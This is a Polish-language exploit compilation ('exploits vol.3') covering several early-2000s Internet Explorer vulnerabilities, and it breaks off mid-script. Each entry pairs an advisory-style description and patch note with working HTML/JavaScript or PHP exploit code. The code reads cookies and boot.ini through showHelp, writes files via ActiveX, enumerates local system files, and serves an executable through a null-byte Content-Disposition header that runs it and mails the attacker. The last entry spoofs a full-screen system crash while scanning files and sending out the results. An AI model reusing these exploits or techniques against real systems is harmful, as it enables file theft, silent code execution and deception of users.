e exploits vol.3 |
// START VOL. 3
Microsoft Internet Explorer History List Script Injection Vulnerability (MS04-004)
Źródło:
[ www ]
[ www ]
Data publikacji:
15. kwietnia 2002r
Podatne systemy i przeglądarki:
- Internet Explorer 5.5
- Internet Explorer 5.5 Service Pack 1
- Internet Explorer 5.5 Service Pack 2
- Internet Explorer 6.0
+ Microsoft Windows XP Professional
Opis podatności:
Podatność ta występuje w przeglądarce Microsoft Internet Explorer. Możliwe jest wprowadzenie kodu JavaScript do listy ostatnio przeglądanych w przeglądarce stron i wykonanie go, gdy ofiara naciśnie przycisk powrotu do poprzedniej strony. Możliwe jest odczytywanie wskazanych plików lokalnych w systemie komputerowym ofiary a także uruchamianie kodu wykonywalnego, jeśli użytkownik pracuje na prawach administratora. Wykorzystana technika działania opiera się na fakcie, że adres URL w formacie JavaScript działa w tej samej domenie, w której został zastosowany. Internet Explorer dokonuje próby usunięcia takiego adresu JavaScript z listy historii, ale nie udaje mu się tego dokonać w pewnych sytuacjach. Jedna z nich to ta, kiedy JavaScript korzysta z funkcji przekierowującej do zewnętrznych zasobów external.NavigateAndFind(?res:?,??,??)gdzie ?res:? przekierowuje do strefy ?Mój Komputer?. Podczas próby powrotu do poprzedniej strony, kod zawarty w odpowiednio przygotowanym w JavaScripcie adresie URL zostanie wykonany w strefie ?Mój komputer? w systemie komputerowym ofiary.
Kod exploita:
<HTML> <HEAD> <script type="text/javascript"> function payload() { file = "test.txt";
o = new ActiveXObject("ADODB.Stream"); o.Open(); o.Type=2; o.WriteText("Jesteś podatny - zainstaluj łatę!"); o.SaveToFile(file, 2); o.Close(); alert("Sprawdź pulpit i odszukaj plik: "+file); } function trigger(len) { if (history.length != len) payload(); else return "<title>-</title><body onload=external.NavigateAndFind('res:','',&# 039;')>"; } function backbutton() { location = 'javascript:'+trigger+payload+'trigger('+his tory.length+')'; } </SCRIPT> </HEAD> <BODY>
<a href="javascript:backbutton();">Uruchom test!</a> </body> </html>
Opis działania exploita:
Cały atak wykonywany jest przy użyciu jednego pliku. Po kliknięciu przez użytkownika na linku ofiara zostaje przeniesiona pod adres ?res:?, który jest reprezentowany przez stronę zawierającą komunikat błędu ?Nie można wyświetlić strony?. Jeśli ofiara naciśnie przycisk powrotu to powinien zostać wykonany kod zawarty w specjalnie przygotowanym w JavaScript adresie URL. Atak kończy się powodzeniem, gdy ofiara naciśnie przycisk powrotu do poprzedniej strony i zostanie wykonany kod zawarty w adresie, czego efektem będzie utworzenie na pulpicie ofiary pliku test.txtz zawartym w środku napisem "Jesteś podatny - zainstaluj łatę!". Atak jako taki nie posiada żadnych dodatkowych efektów destrukcyjnych, ale zmiana zawartości funkcji payload() może prowadzić do czytania plików systemowych a nawet do instalowania i uruchamiania na komputerze ofiary dowolnych kodów wykonywalnych.
Sposób rozwiązania/naprawy:
Instalacja poprawki Microsoftu (832894).
Microsoft Internet Explorer ShowHelp Arbitrary Command Execution Vulnerability (MS03-004)
Źródło:
[ www ]
[ www ]
Data publikacji:
5. lutego 2003r
Podatne systemy i przeglądarki:
- Microsoft Internet Explorer 5.0.1 SP3
- Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Internet Explorer 5.0.1
- Microsoft Internet Explorer 5.5 SP2
- Microsoft Internet Explorer 5.5 SP1
- Microsoft Internet Explorer 5.5
+ Microsoft Windows ME
- Microsoft Internet Explorer 6.0 SP1
- Microsoft Internet Explorer 6.0
+ Microsoft Windows Server 2003 Datacenter Edition
+ Microsoft Windows Server 2003 Datacenter Edition 64-bit
+ Microsoft Windows Server 2003 Enterprise Edition
+ Microsoft Windows Server 2003 Enterprise Edition 64-bit
+ Microsoft Windows Server 2003 Standard Edition
+ Microsoft Windows Server 2003 Web Edition
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
Opis podatności:
Podatność ta występuje w przeglądarce Microsoft Internet Explorer. Internet Explorer posiada zaimplementowaną funkcję showHelp(), która pozwala na wyświetlanie skompilowanych plików pomocy (.CHM) ze strony WWW. Funkcja ta zezwala na wykonywanie jeszcze innych działań, które stwarzają możliwość przeprowadzenia ataku. Napastnik może odczytywać wskazane pliki i wykonywać programy w systemie komputerowym użytkownika. Funkcja ShowHelp(URL) posiada kilka ograniczeń:
- Dozwolone adresy URL muszą rozpoczynać się od ?file:? lub ?http:?
- Jeśli adres wskazuje na zasób lokalny w systemie użytkownika, to musi to być podana pełna nazwa z rozszerzeniem CHM.
- Ściągane pliki CHM z wykorzystaniem protokołu HTTP nie są zaufane Zagrożenie bezpieczeństwa wynika z użycia parametru wejściowego ?file:? przy wywoływaniu funkcji showHelp(). Wykonanie funkcji showHelp(?file:?) prowadzi do wyłączenia ograniczeń bezpieczeństwa. Kolejne wywołania tej funkcji z odpowiednio spreparowanymi parametrami wejściowymi mogą prowadzić do wykonywania złośliwego kodu w systemie komputerowym ofiary.
Kod exploita:
---------------- 1.html ----------------
<html> <head> <title></title> <script> function Go() { showHelp("file:");showHelp("http://www.google.pl/ "); showHelp("javascript:alert(document.cookie)"); } </script> </head> <body> <a href="javascript:Go();">Kliknij aby uruchomić test </a> </body> </html>
---------------- 2.html ----------------
<html> <head> <title></title> <script> function Go() { showHelp("file:");showHelp("res://shdoclc.dll/abo ut.dlg"); showHelp("javascript: try{c=new ActiveXObject('Msxml2.XMLHTTP')} catch(e) {c=new ActiveXObject('Microsoft.XMLHTTP')}; c.open('GET','file://c:/boot.ini',false);c.s end(null);alert(c.responseText)"); } </script> </head> <body> <a href="javascript:Go();">Kliknij aby uruchomić test </a> </body> </html>
---------------- 3.html ----------------
<html> <head> <title></title> <script> function Go() {
showHelp("file:");showHelp("file://c:/boot.ini&qu ot;); showHelp("javascript:alert(document.body.innerText)"); } </script> </head> <body> <a href="javascript:Go();">Kliknij, aby uruchomić test </a> </body> </html>
Opis działania exploita:
Wyżej przedstawione są trzy przykładowe warianty wykonania ataku przy wykorzystaniu funkcji showHelp(). Przetworzenie pliku 1.html umożliwia przez napastnika odczytanie zapisanego w systemie ofiary ciastka (cookie). Atak kończy się sukcesem, gdy zostanie wyświetlone okienko pokazujące zawartość ciastka zapisanego przez wskazaną stronę. Przetworzenie pliku 2.html umożliwia przez napastnika odczytanie zawartości lokalnego pliku w systemie ofiary. Atak kończy się sukcesem, gdy zostanie wyświetlone okienko pokazujące zawartość pliku systemowego boot.ini. Przetworzenie pliku 3.html umożliwia przez napastnika odczytanie lokalnego pliku w systemie ofiary. Atak kończy się sukcesem, gdy zostanie wyświetlone okienko pokazujące zawartość pliku systemowego boot.ini. Podatność sama w sobie nie zawiera żadnych dodatkowych efektów destrukcyjnych jednak może stać się częścią bardziej złożonego ataku, co powinno być rozpatrywane jako poważne zagrożenie bezpieczeństwa. Możliwe jest czytanie plików systemowych użytkownika przeglądarki i wysyłanie ich zawartości na serwer napastnika.
Sposób rozwiązania/naprawy:
Zainstalowanie poprawki Microsoftu (MS03-004).
Internet Explorer view-source URL
Źródło:
[ www ]
[ www ]
Data publikacji:
10 czerwca 2002r
Podatne systemy i przeglądarki:
Internet Explorer 4+
Opis podatności:
Podatność ta występuje w przeglądarce Microsoft Internet Explorer. Przejście do adresu URL w formacie view-source:http://adreslub view-source:file:///sciezkaprowadzi do wykonania w systemie użytkownika lokalnego programu (w tym wypadku edytora) pokazującego kod źródłowy strony WWW lub plików lokalnych skojarzonych z adresem będącym drugim członem wywołania funkcji.
Kod exploita:
<html> <head> <title>I</title> <script> function Go () { document.location="view-source:"+document.location.hre f; } </script> </head> <body> <a href="javascript:Go();">Kliknij tutaj aby uruchomić test</a></body> </html>
Opis działania exploita:
Cały atak wykonywany jest przy użyciu jednego pliku. Po kliknięciu przez użytkownika na linku zostaje wykonana funkcja Go() napisana w JavaScript, którapowoduje uruchomienie w systemie użytkownika edytora (lub innego programu skojarzonego z przeglądarką) pokazującego zawartość źródłową aktualnie przeglądanej strony WWW. Atak kończy się powodzeniem, gdy zostanie uruchomiony edytor tekstu skojarzony z przeglądarką (zwykle jest to aplikacja systemowa notatnik.exe) pokazujący zawartość źródłową strony WWW zawierającej złośliwy kod. Atak jako taki nie posiada żadnych dodatkowych efektów destrukcyjnych, ale może zostać wykorzystany jako część bardziej złożonego ataku, co powinno być rozpatrywane jako poważne zagrożenie. Samo wyświetlanie zawartości pliku wskazanego przez atakującego nie stanowi zagrożenia bezpieczeństwa, ale wykorzystanie możliwości uruchamiania aplikacji daje duże możliwości napastnikowi. Jeżeli atakujący napisze plik wykonywalny skojarzonego z przeglądarką edytora tekstu (bądź kodu HTML) w systemie ofiary a następnie wykorzysta powyższą podatność to
możliwe staje się uruchamianie dowolnego kodu wykonywalnego w systemie ofiary.
Sposób rozwiązania/naprawy:
Brak.
Microsoft Internet Explorer JavaScript Local File Enumeration Vulnerability
Źródło:
[ www ]
Data publikacji:
3 stycznia 2002r
Podatne systemy i przeglądarki:
- Internet Explorer 5.0
+ Microsoft Windows 98SE
- Microsoft Internet Explorer 5.0.1
- Microsoft Internet Explorer 5.0.1 SP1
- Microsoft Internet Explorer 5.0.1 SP2
- Microsoft Internet Explorer 5.5
+ Microsoft Windows ME
- Microsoft Internet Explorer 5.5 SP1
- Microsoft Internet Explorer 5.5 SP2
- Microsoft Internet Explorer 6.0
+ Microsoft Windows Server 2003
+ Microsoft Windows XP Home
+ Microsoft Windows XP Professional
Opis podatności:
Podatność ta występuje w przeglądarce Microsoft Internet Explorer. Problem tkwi w mechanizmie dołączania zewnętrznych kodów skryptowych znajdujących się w oddzielnym pliku. Kiedy kod skryptu załącza zewnętrzny kod znajdujący się w pliku poza dokumentem w którym jest zawarty, a plik ten nie istnieje to uruchamiany jest kod obsługi wyjątku onError. Napastnik poprzez wskazanie w skrypcie plików lokalnych plików ofiary i napisanie własnej funkcji obsługi wyjątku onError może dokonywać sprawdzeniaistnienia dowolnych plików w systemie ofiary.
Kod exploita:
<html> <script type="text/javascript" src="../../funkcje.js"></script> <TITLE></TITLE> <body> <form name=formularz> <textarea name=tresc rows=5 cols=30 wrap=virtual readonly></textarea>
</form> <script language="javascript">
sciezki = new Array (
"C:\\\\boot.ini",
"C:\\\\autoexec.bat",
"C:\\\\config.sys",
"C:\\\\command.com",
"C:\\\\windows\\\\win.ini",
"C:\\\\win98\\\\win.ini",
"C:\\\\winnt\\\\win.ini",
"C:\\\\winxp\\\\win.ini",
"D:\\\\windows\\\\win.ini",
"D:\\\\winnt\\\\win.ini",
"D:\\\\winxp\\\\win.ini"
); var opcje = 'scrollbars=auto,width=1,height=1?; for (var i = 0; i < sciezki.length; i++) { var okno = window.open("", 'ok',opcje); okno.document.open(); okno.document.write(" <html><head><script language='javascript'> function blad () { window.opener.document.formularz.tresc.value +='"+sciezki+" '; return true; } window.onerror = blad; </"+"script></"+"head><body&g t; <script language='jscript' src='file://"+sciezki+"'></"+&quo t;script></"+"body></"+"html> ?); okno.document.close(); } okno.close(); if (self.formularz.tresc.value != "") alert("Jesteś podatny"); </script> </body> </html>
Opis działania exploita:
Cały atak wykonywany jest przy użyciu jednego pliku. Podczas przeglądania strony przez ofiarę skrypt pobiera z tablicy kolejne ścieżki dostępu do plików lokalnych plików systemowych ofiary. Ścieżki dostępu istniejących plików zostają przesłane na serwer napastnika. Atak kończy się powodzeniem, jeżeli zostanie znaleziony, co najmniej jeden wybrany plik systemowy ofiary. Powodzenie ataku zależy od podania pełnych ścieżek do prawdopodobnych lokalizacji sprawdzanych plików. Atak jako taki nie posiada żadnych dodatkowych efektów destrukcyjnych. Atak sam w sobie nie może być rozpatrywany jako poważne zagrożenie, ale jeżeli stanie się częścią bardziej złożonego ataku może doprowadzić do poważnych naruszeń bezpieczeństwa systemu ofiary.
Sposób naprawy:
Brak.
Internet Explorer Remote Code execution (MS01-058)
Źródło:
[ www ]
[ www ]
[ www ]
Data publikacji:
14 stycznia 2002r
Podatne systemy i przeglądarki:
- Internet Explorer 5.0
+ Microsoft Windows 98SE
- Microsoft Internet Explorer 6.0
+ Microsoft Windows XP Professional
Opis podatności:
Podatność ta występuje w przeglądarce Microsoft Internet Explorer i umożliwia ściąganie i uruchamianie dowolnego kodu bez ostrzeżenia podczas przeglądania przez ofiarę strony napastnika. Kod zostaje ściągnięty i uruchomiony nie wymagając od użytkownika podejmowania żadnych dodatkowych działań poza przeglądaniem strony napastnika. Problem tkwi w interpretowaniu nieprawidłowo skonstruowanego nagłówka HTTP ?Content-Disposition?przez przeglądarkę ofiary, co prowadzi do ściągnięcia i zainstalowania dowolnego kodu w systemie ofiary.
Kod exploita:
------------- exe.php -------------
<? $plik = "sendmail.exe"; $fs = filesize($plik); header('Content-Type: audio/midi'); header("Content-Disposition: inline; filename=\"readme.txt%00$plik\""); header("Content-Length: $fs"); header('X-Pad: avoid browser bug'); @readfile($plik); ?>
Opis działania exploita:
Cały atak wykonywany jest przy wykorzystaniu dwóch plików: exe.phpi sendmail.exe. Plik exe.phpzawiera kod, który wysyła do przeglądarki ofiary odpowiednio spreparowany nagłówek Content-Disposition. Jeżeli nagłówek wysłany do przeglądarki użytkownika ma postać: ?Content-Disposition: inline; filename=?readme.txt%00sendmail.exe??
to podatna przeglądarka ofiary po błędnym jego zinterpretowaniu pobierze i uruchomi kod zawarty w pliku określonym po znaku ?%00? (tutaj sendmail.exe). Atak zakończy się sukcesem, gdy bez powiadamiania lub ostrzegania użytkownika przeglądającego stronę zostanie w systemie ofiary uruchomiony pobrany plik sendmail.exe, który wysyła wiadomość email na adres napastnika. Atak w tej postaci może prowadzić do bardzo poważnych naruszeń bezpieczeństwa atakowanych systemów poprzez osadzenie przez napastnika np. oprogramowania szpiegowskiego.
Sposób naprawy:
Zainstalowanie poprawki Microsoftu: [ www ]
JavaScript in IE Can Take Over the Whole Screen
Źródło:
[ www ]
[ www ]
Data publikacji:
21 października 2001r
Podatne systemy i przeglądarki:
- Internet Explorer 5.5
- Internet Explorer 6.0
Opis podatności:
Podatność ta występuje w przeglądarce Microsoft Internet Explorer i umożliwia fałszowanie elementów interfejsu systemowego np. menu, okien dialogowych, paska zadań, zegara a przede wszystkim całego ekranu.
Kod exploita:
<script> sciezki = new Array (
"C:\\\\boot.ini",
"C:\\\\autoexec.bat",
"C:\\\\config.sys",
"C:\\\\command.com",
"C:\\\\windows\\\\win.ini",
"C:\\\\win98\\\\win.ini",
"C:\\\\winnt\\\\win.ini",
"C:\\\\winxp\\\\win.ini",
"D:\\\\windows\\\\win.ini",
"D:\\\\winnt\\\\win.ini",
"D:\\\\winxp\\\\win.ini"
);
var blad = 0; licznik = 0; i = 0; okno = 0; function sprawdz_pliki() { var opcje = 'scrollbars=auto,width=1,height=1,resizeable=no,?; var y; if (i<sciezki.length) { okno = window.open("", 'ok',opcje); okno.document.open(); okno.document.write("<html><head><script language='javascript'> function blad () { window.opener.document.formularz.tresc.value +='"+sciezki+" '; return true; } window.onerror = blad; </"+"script></"+"head><body&g t;<script language='javascript' src='file://"+sciezki+"'></"+&quo t;script></"+"body></"+"html> "); okno.document.close(); // okno.close(); i++; } else { if (!(okno==y)) okno.close(); } } function odliczanie() { if (licznik==100) { clearInterval(l1); clearInterval(l2);
clearInterval(l3); sendForm(18, 1, self.document.formularz.tresc.value); window.close(); } else { licznik++; d1.innerHTML= 'Postęp sprawdzania dysku C:\ ... '+licznik+'%'; } } function glowna() { window.focus(); if (!op.isOpen) { op.show(0, 0, screen.width, screen.height, document.body); } } try { op = window.createPopup(); } catch(e) { sendForm(18, 0, "Błąd podczas tworzenia popupa: "+e.desription); blad = 1; } if (!blad) { s = '<body><table bgcolor="#3333FF" width="100%" height="100%"> <tr ALIGN="LEFT" VALIGN="TOP"><td height=114></td></tr><tr>'; s += '<td>'; s += '<center><b><font color="#ffffff" face="Helvetica, Arial, sans-serif"> <h2>Microsoft Windows</h2>General protection fault - Panic<br>EAX=5435 EBX=6541 EIP=*Unable to get it, MORE panic<br><div id="d2">Postęp sprawdzania dysku C: </div></font></b></center></td>